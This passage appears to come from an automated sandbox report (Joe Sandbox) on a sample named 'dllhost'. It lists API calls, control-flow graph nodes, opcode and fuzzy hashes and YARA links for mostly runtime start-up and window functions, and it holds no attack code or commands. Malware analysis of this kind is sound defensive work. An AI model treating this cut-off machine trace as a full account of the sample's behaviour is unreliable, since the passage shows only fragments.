40641f 79->89 80->83 81->83 82->76 90 406522-406529 82->90 83->68 84->83 86 4064a6-4064c5 84->86 85->57 86->86 92 4064c7-4064dc 86->92 94 406434 88->94 89->94 96 406539-406540 90->96 97 40652b-406537 90->97 92->92 99 4064de-4064f3 92->99 94->69 96->85 97->76 97->96 102 4064f5-4064fd 99->102 103 4064fe-406500 99->103 102->103 103->83 103->86
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00100000,20000000,00000000), ref: 004061FE
                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000290), ref: 00406222
                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 00406252
                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000040), ref: 00406270
                                                                                  • TlsAlloc.KERNEL32 ref: 004062E3
                                                                                  • TlsSetValue.KERNEL32(00000000), ref: 004062F7
                                                                                  • RtlAddVectoredExceptionHandler.NTDLL(00000000,004083E4), ref: 00406304
                                                                                  • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 00406322
                                                                                  • TlsFree.KERNELBASE ref: 0040632E
                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,?,00000000), ref: 0040658E
                                                                                    • Part of subcall function 004089E4: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000001,?,0040634F), ref: 004089ED
                                                                                    • Part of subcall function 00405FE4: GetTickCount.KERNEL32 ref: 00405FE4
                                                                                  • HeapDestroy.KERNELBASE(00000000), ref: 00406594
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$Alloc$CreateExceptionHandlerVectored$CallbackCompletionCountDestroyDispatcherFreePortRemoveTickUserValue
                                                                                  • String ID: {@
                                                                                  • API String ID: 277470114-1579578673
                                                                                  • Opcode ID: a252d9a9bbabb819f35d15b8839e444d3c8de345bd946ee0ddfb99abba457d68
                                                                                  • Instruction ID: 395f014a8140dccc6966b0a3a1c57690136f4d7ee00889256cdb175a7fd384a4
                                                                                  • Opcode Fuzzy Hash: a252d9a9bbabb819f35d15b8839e444d3c8de345bd946ee0ddfb99abba457d68
                                                                                  • Instruction Fuzzy Hash: 3AD1AD75A00218EFDB04DF98D985BADBBB1BF08315F15406AE806BB3A1D774AD91CF18
                                                                                  Function 00407BE4 Relevance: 24.2, APIs: 16, Instructions: 179memorywindowregistryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • LoadIconW.USER32(?,00000001), ref: 00407C16
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00407C2F
                                                                                  • RegisterClassW.USER32(00000008), ref: 00407C49
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00407C53
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00407C5A
                                                                                  • CreateWindowExW.USER32(00000080,0040933C,0040933C,80000000,00000000,00000000,0000012C,000000A9,00000000,00000000,?,00000000), ref: 00407C8D
                                                                                  • GetWindowRect.USER32(?,?), ref: 00407CBE
                                                                                  • MonitorFromWindow.USER32(?,00000002), ref: 00407CD0
                                                                                  • GetMonitorInfoW.USER32(00000000), ref: 00407CD7
                                                                                  • SetWindowPos.USER32(?,000000FF,?,00000001,000000FF,000000FF,00000041), ref: 00407D60
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00407D6B
                                                                                  • LoadAcceleratorsW.USER32(?,00000001), ref: 00407D79
                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00407D98
                                                                                  • TranslateMessage.USER32(?), ref: 00407DA5
                                                                                  • DispatchMessageW.USER32(?), ref: 00407DB2
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00407DC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Load$HeapMessageMonitorTranslate$AcceleratorAcceleratorsAllocCallbackClassCreateCursorDispatchDispatcherFromIconInfoProcessRectRegisterShowUser
                                                                                  • String ID:
                                                                                  • API String ID: 3991283183-0
                                                                                  • Opcode ID: 9f61036d0e7f02a6a7ba6517aaf0fbfdc1e91730bf49ef7b523983749e8edbab
                                                                                  • Instruction ID: 5fe4f1e6764284e1476b4f887ecc18003e39f80d17944e0d46fd62ec5d74e65c
                                                                                  • Opcode Fuzzy Hash: 9f61036d0e7f02a6a7ba6517aaf0fbfdc1e91730bf49ef7b523983749e8edbab
                                                                                  • Instruction Fuzzy Hash: CB512A71A0021AAFDF00DFA8DD48AAEBBB9FF48310F148125F605F7291D774A945CB94
                                                                                  Function 00401000 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetVersion.KERNEL32 ref: 00401026
                                                                                    • Part of subcall function 00403B48: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040105E,00000001), ref: 00403B59
                                                                                    • Part of subcall function 00403B48: HeapDestroy.KERNEL32 ref: 00403B98
                                                                                  • GetCommandLineA.KERNEL32 ref: 00401086
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 004010B1
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004010D4
                                                                                    • Part of subcall function 00404890: ExitProcess.KERNEL32 ref: 004048AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2057626494-0
                                                                                  • Opcode ID: 446b7fcb8fcb92790f71322ff8387f25dfb74f1e11fa9a61e5eee6a62c75f59e
                                                                                  • Instruction ID: 091a06186873a18e525cd289e51ac515907a6106f624eaab6d6e2ea4d711997a
                                                                                  • Opcode Fuzzy Hash: 446b7fcb8fcb92790f71322ff8387f25dfb74f1e11fa9a61e5eee6a62c75f59e
                                                                                  • Instruction Fuzzy Hash: 7721D2F1900745AADB04AFB59D06B6E7BB8AB44705F10443FF601BB2E2DB788940CA5D
                                                                                  Function 004047D4 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 4047d4-4047e3 call 403f38 143 4047e5-4047f0 GetCurrentProcess TerminateProcess 140->143 144 4047f6-40480c 140->144 143->144 145 40484a-40485e call 403bbc 144->145 146 40480e-404815 144->146 155 404860-404866 call 404564 145->155 156 404867-404871 ExitProcess 145->156 148 404817-404823 146->148 149 404839-404849 call 403bbc 146->149 152 404825-404829 148->152 153 404838 148->153 149->145 157 40482b 152->157 158 40482d-404836 152->158 153->149 157->158 158->152 158->153
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00404889,?,00000000,00000000,004010E9,00000000,00000000), ref: 004047E9
                                                                                  • TerminateProcess.KERNEL32(00000000,?,00404889,?,00000000,00000000,004010E9,00000000,00000000), ref: 004047F0
                                                                                  • ExitProcess.KERNEL32 ref: 00404871
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: ad8cc25982e85b102fcf734b02b4049def137bff0af21db10ca1abc7b14d613d
                                                                                  • Instruction ID: 462893b16460747d6fcfe72fcdd75f783e50c19e3ae09171eda3095d480ad325
                                                                                  • Opcode Fuzzy Hash: ad8cc25982e85b102fcf734b02b4049def137bff0af21db10ca1abc7b14d613d
                                                                                  • Instruction Fuzzy Hash: 9401A9B2D04341AAD620AF65FC4561A7BA4ABC0756B10843FF940B31E2D778DD49C61E
                                                                                  Function 00403B48 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 161 403b48-403b66 HeapCreate 162 403b68-403b75 call 4023bc 161->162 163 403b9e-403ba0 161->163 166 403b84-403b87 162->166 167 403b77-403b82 call 403470 162->167 169 403ba1-403ba4 166->169 170 403b89 call 402a90 166->170 173 403b8e-403b90 167->173 170->173 173->169 174 403b92-403b98 HeapDestroy 173->174 174->163
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040105E,00000001), ref: 00403B59
                                                                                    • Part of subcall function 004023BC: GetVersionExA.KERNEL32 ref: 004023DB
                                                                                  • HeapDestroy.KERNEL32 ref: 00403B98
                                                                                    • Part of subcall function 00403470: HeapAlloc.KERNEL32(00000000,00000140,00403B81,000003F8), ref: 0040347D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2507506473-0
                                                                                  • Opcode ID: 7eef139956fc6b6503d22f50377ba22f9a0d4510e9bed10b0cab0d45bef97551
                                                                                  • Instruction ID: 38e43db576a1c1f139e2ce340b371da4423acca777513b2ecda9cd47fb161bbd
                                                                                  • Opcode Fuzzy Hash: 7eef139956fc6b6503d22f50377ba22f9a0d4510e9bed10b0cab0d45bef97551
                                                                                  • Instruction Fuzzy Hash: 26F06C70615241AADF605F715D4A76539A8974075FF10443BF901E41E2FBBC9A80D51E
                                                                                  Function 00401CF8 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 175 401cf8-401d23 176 401d25-401d2e 175->176 177 401d68-401d6b 175->177 178 401d34-401d58 call 403e20 call 402c5c call 401d5f 176->178 179 401dc7-401dcc 176->179 177->179 180 401d6d-401d72 177->180 178->179 200 401d5a 178->200 182 401dd1-401dd6 179->182 183 401dce-401dd0 179->183 184 401d74-401d7a 180->184 185 401d7c-401d7e 180->185 187 401dd7-401ddf RtlAllocateHeap 182->187 183->182 188 401d7f-401d88 184->188 185->188 192 401de5-401df3 187->192 189 401db8-401db9 188->189 190 401d8a-401db6 call 403e20 call 402600 call 401dbe 188->190 189->187 190->189 190->192 200->192
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00401DDF
                                                                                    • Part of subcall function 00403E20: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0040192E,00000009,00000000,00000000,00000001,00403B05,00000001,00000074,?,?,00000000,00000001), ref: 00403E5D
                                                                                    • Part of subcall function 00403E20: EnterCriticalSection.KERNEL32(?,?,?,0040192E,00000009,00000000,00000000,00000001,00403B05,00000001,00000074,?,?,00000000,00000001), ref: 00403E78
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                  • String ID:
                                                                                  • API String ID: 1616793339-0
                                                                                  • Opcode ID: 756cd01c39194698c178267817efcecc07595685624dfce0e6f70e5fc4d986ae
                                                                                  • Instruction ID: 0eb1dc17c14108799a2f69fa9380fb746230cb3b553324af04f251d97b223738
                                                                                  • Opcode Fuzzy Hash: 756cd01c39194698c178267817efcecc07595685624dfce0e6f70e5fc4d986ae
                                                                                  • Instruction Fuzzy Hash: B821B531A00245ABDB10AF65DC42B9EB7A4EF01764F104637F421FB2E1D778B9418A9D
                                                                                  Function 00408BE4 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 203 408be4-408bea 204 408bf7 203->204 205 408bec-408bf3 CloseHandle 203->205 205->204
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(?,0040657A), ref: 00408BED
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: eefea5864f2e9bc3aa93829615552e57cfb27a82f740677d3ccb14cd068e4179
                                                                                  • Instruction ID: 51c91903cda41e96d084a3e42638c69303d69842121a8251b0a5f197d8c491fa
                                                                                  • Opcode Fuzzy Hash: eefea5864f2e9bc3aa93829615552e57cfb27a82f740677d3ccb14cd068e4179
                                                                                  • Instruction Fuzzy Hash: 5FB09270400B058FC6348F39C94E81A77B8BA013303A44B58F0F2E14F2DB38E80B8E08

                                                                                  Non-executed Functions

                                                                                  Function 00402310 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 278 402310-40231b 279 40231d-40232c LoadLibraryA 278->279 280 40235f-402366 278->280 281 402395-402397 279->281 282 40232e-402343 GetProcAddress 279->282 283 402368-40236e 280->283 284 40237e-40238a 280->284 285 402391-402394 281->285 282->281 286 402345-40235a GetProcAddress * 2 282->286 283->284 288 402370-402377 283->288 284->285 286->280 288->284 289 402379-40237c 288->289 289->284
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0040206C,?,Microsoft Visual C++ Runtime Library,00012010,?,00409484,?,004093AC,?,?,?,Runtime Error!Program: ), ref: 00402322
                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040233A
                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040234B
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00402358
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                  • API String ID: 2238633743-4044615076
                                                                                  • Opcode ID: bf1531d2474d3faa7ed7e2d01ba0ec08b43ca523d80dba313fb880c13d5286b9
                                                                                  • Instruction ID: a91e97475604824d52661f65b716ec7d38c927d4a6d07e27c956461a352b1280
                                                                                  • Opcode Fuzzy Hash: bf1531d2474d3faa7ed7e2d01ba0ec08b43ca523d80dba313fb880c13d5286b9
                                                                                  • Instruction Fuzzy Hash: E4017571300312ABCB119FB55D88A5B3BE89B89791318043BE905E22F2E6FCDC419B5A
                                                                                  Function 00407DE4 Relevance: .0, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 38ddf16cb77d3606a76c7540dec3e41d54c30cddb23cbb6426311c0e5d7cbe65
                                                                                  • Instruction ID: 9569aa763f9872f3d00b81e12cb9f4a12378b404671576db27e6ea43a04b0efe
                                                                                  • Opcode Fuzzy Hash: 38ddf16cb77d3606a76c7540dec3e41d54c30cddb23cbb6426311c0e5d7cbe65
                                                                                  • Instruction Fuzzy Hash: E4015AB5A01200AFC301DF08C940E6677E9BFC8B10F6582AEE5499B256D372E802CB94
                                                                                  Function 0040123C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 177COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 217 40123c-40126a 218 4012b2-4012b5 217->218 219 40126c-401286 LCMapStringW 217->219 220 4012c7-4012cf 218->220 221 4012b7-4012c4 call 405038 218->221 222 401290-4012a2 LCMapStringA 219->222 223 401288-40128e 219->223 227 4012d1-4012e9 LCMapStringA 220->227 228 4012ee-4012f1 220->228 221->220 224 4012a8 222->224 225 4013ca 222->225 223->218 224->218 229 4013cc-4013dd 225->229 227->229 228->225 231 4012f7-4012fa 228->231 232 401304-401328 MultiByteToWideChar 231->232 233 4012fc-401301 231->233 232->225 234 40132e-401362 call 401df4 232->234 233->232 234->225 238 401364-40137b MultiByteToWideChar 234->238 238->225 239 40137d-401396 LCMapStringW 238->239 239->225 240 401398-40139c 239->240 241 4013de-401414 call 401df4 240->241 242 40139e-4013a1 240->242 241->225 249 401416-40142c LCMapStringW 241->249 244 4013a7-4013aa 242->244 245 401459-40145b 242->245 244->225 247 4013ac-4013c4 LCMapStringW 244->247 245->229 247->225 247->245 249->225 250 40142e-401433 249->250 251 401435-401437 250->251 252 401439-40143c 250->252 253 40143f-401453 WideCharToMultiByte 251->253 252->253 253->225 253->245
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0040937C,00000001,00000000,00000000,74DEE860,0046302C,?,?,?,00405455,?,?,?,00000000), ref: 0040127E
                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,004091E4,00000001,00000000,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 0040129A
                                                                                  • LCMapStringA.KERNEL32(?,?,?,UT@,?,?,74DEE860,0046302C,?,?,?,00405455,?,?,?,00000000), ref: 004012E3
                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,UT@,00000000,00000000,74DEE860,0046302C,?,?,?,00405455,?,?,?,00000000), ref: 0040131B
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401373
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401389
                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00405455,?,?,?,00000000,00000001), ref: 004013BC
                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00405455,?,?,?,00000000,00000001), ref: 00401424
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID: ,0F$UT@
                                                                                  • API String ID: 352835431-2878614304
                                                                                  • Opcode ID: 20a1db820de116d8ad5c0da650e76a168eb42664ba9ed105f6b272a5748af243
                                                                                  • Instruction ID: 70022fb4d6e7daf8109784e1358cb703ad01eb556abcdb82bbaa93dddd8f4f9e
                                                                                  • Opcode Fuzzy Hash: 20a1db820de116d8ad5c0da650e76a168eb42664ba9ed105f6b272a5748af243
                                                                                  • Instruction Fuzzy Hash: ED516731500249EFDF228F95CC45AAF7BB9FB48750F10812AF911B22B0D3398D60DB69
                                                                                  Function 00401460 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
